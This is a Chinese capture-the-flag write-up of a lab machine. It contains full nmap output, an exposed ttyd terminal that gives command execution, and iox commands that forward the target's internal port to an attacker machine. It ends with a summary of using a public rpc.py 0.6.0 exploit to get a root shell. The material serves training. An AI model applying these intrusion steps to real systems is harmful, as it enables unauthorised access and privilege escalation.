信息收集:
root@iZt4nbifrvtk7cy11744y4Z:~# nmap -p- -Pn -A -sS -T4 192.168.216.210Starting Nmap 7.80 ( https://nmap.org ) at 2025-02-24 18:01 CSTNmap scan report for 192.168.216.210Host is up (0.0039s latency).Not shown: 65533 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)8000/tcp open http-alt ttyd/1.7.3-a2312cb (libwebsockets/3.2.0)| fingerprint-strings: | FourOhFourRequest: | HTTP/1.0 404 Not Found| server: ttyd/1.7.3-a2312cb (libwebsockets/3.2.0)| content-type: text/html| content-length: 173| <html><head><meta charset=utf-8 http-equiv="Content-Language" content="en"/><link rel="stylesheet"type="text/css" href="/error.css"/></head><body><h1>404</h1></body></html>| GetRequest: | HTTP/1.0 200 OK| server: ttyd/1.7.3-a2312cb (libwebsockets/3.2.0)| content-type: text/html| content-length: 677047| <!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><title>ttyd - Terminal</title><link rel="icon"type="image/png" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAcCAYAAAAAwr0iAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAA0xpVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuNi1jMDY3IDc5LjE1Nzc0NywgMjAxNS8wMy8zMC0yMzo0MDo0MiAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wTU09Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9tbS8iIHhtbG5zOnN0UmVmPSJodHRwOi8vb| Socks5, X11Probe: | HTTP/1.0 403 Forbidden| server: ttyd/1.7.3-a2312cb (libwebsockets/3.2.0)| content-type: text/html| content-length: 173|_ <html><head><meta charset=utf-8 http-equiv="Content-Language" content="en"/><link rel="stylesheet" type="text/css" href="/error.css"/></head><body><h1>403</h1></body></html>|_http-server-header: ttyd/1.7.3-a2312cb (libwebsockets/3.2.0)|_http-title: ttyd - Terminal1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :SF-Port8000-TCP:V=7.80%I=7%D=2/24%Time=67BC4374%P=x86_64-pc-linux-gnu%r(GeSF:tRequest,2AC0,"HTTP/1.0x20200x20OKrnserver:x20ttyd/1.7.3-a2312cSF:bx20(libwebsockets/3.2.0)rncontent-type:x20text/htmlrncontentSF:-length:x20677047rnrn<!DOCTYPEx20html><htmlx20lang="en"><head>SF:<metax20charset="UTF-8"><metax20http-equiv="X-UA-Compatible"x20cSF:ontent="IE=edge,chrome=1"><title>ttydx20-x20Terminal</title><linkxSF:20rel="icon"x20type="image/png"x20href="data:image/png;base64,iVSF:BORw0KGgoAAAANSUhEUgAAACAAAAAcCAYAAAAAwr0iAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSF:SBJbWFnZVJlYWR5ccllPAAAA0xpVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tlSF:dCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcGSF:1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlISF:DUuNi1jMDY3IDc5LjE1Nzc0NywgMjAxNS8wMy8zMC0yMzo0MDo0MiAgICAgICAgIj4gPHJkSF:ZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW5SF:0YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wTU09ImSF:h0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9tbS8iIHhtbG5zOnN0UmVmPSJodHRwOi8vbSF:")%r(X11Probe,127,"HTTP/1.0x20403x20Forbiddenrnserver:x20ttyd/1.SF:7.3-a2312cbx20(libwebsockets/3.2.0)rncontent-type:x20text/htmlSF:rncontent-length:x20173rnrn<html><head><metax20charset=utf-8x2SF:0http-equiv="Content-Language"x20content="en"/><linkx20rel="stylSF:esheet"x20type="text/css"x20href="/error.css"/></head><body><h1SF:>403</h1></body></html>")%r(FourOhFourRequest,127,"HTTP/1.0x20404x20SF:Notx20Foundrnserver:x20ttyd/1.7.3-a2312cbx20(libwebsockets/3.2SF:.0)rncontent-type:x20text/htmlrncontent-length:x20173rnrn<hSF:tml><head><metax20charset=utf-8x20http-equiv="Content-Language"x20SF:content="en"/><linkx20rel="stylesheet"x20type="text/css"x20hreSF:f="/error.css"/></head><body><h1>404</h1></body></html>")%r(Socks5,1SF:27,"HTTP/1.0x20403x20Forbiddenrnserver:x20ttyd/1.7.3-a2312cbx2SF:0(libwebsockets/3.2.0)rncontent-type:x20text/htmlrncontent-lenSF:gth:x20173rnrn<html><head><metax20charset=utf-8x20http-equiv="CSF:ontent-Language"x20content="en"/><linkx20rel="stylesheet"x20typSF:e="text/css"x20href="/error.css"/></head><body><h1>403</h1></bodySF:></html>");No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).TCP/IP fingerprint:OS:SCAN(V=7.80%E=4%D=2/24%OT=22%CT=1%CU=42269%PV=Y%DS=4%DC=T%G=Y%TM=67BC438OS:B%P=x86_64-pc-linux-gnu)SEQ(SP=FF%GCD=1%ISR=106%TI=Z%CI=Z%II=I%TS=A)OPS(OS:O1=M54EST11NW7%O2=M54EST11NW7%O3=M54ENNT11NW7%O4=M54EST11NW7%O5=M54EST11OS:NW7%O6=M54EST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(OS:R=Y%DF=Y%T=40%W=FAF0%O=M54ENNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=ASOS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=OS:R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%ROS:UCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)Network Distance: 4 hopsService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTE (using port 111/tcp)HOP RTT ADDRESS1 3.35 ms 192.168.45.12 3.34 ms 192.168.45.2543 3.70 ms 192.168.251.14 9.58 ms 192.168.216.210OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 36.43 seconds开放了8000的http服务,是一个shell终端,直接可以RCE
上传linpeas.sh发现在65432端口有运行tcp服务,
而且pspy32s也发现root身份运行了rpc.py,可能就是65432端口运行的服务
上传iox进行端口转发
iox端口转发(将靶机65432转发到攻击机3333):攻击机运行./iox fwd -l *2222 -l 3333 -k 123456靶机运行(192.168.45.184是攻击机IP)./iox fwd -r 127.0.0.1:65432 -r *192.168.45.184:2222 -k 123456nmap扫描转发出来的端口
没看到什么有用的东西,联想到之前的rpc.py,检索漏洞
利用漏洞rpc.py 0.6.0 RCE,修改脚本的目标和执行命令
拿到root的shell
拿到proof
原文始发于微信公众号(EuSRC安全实验室):PG_PC
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论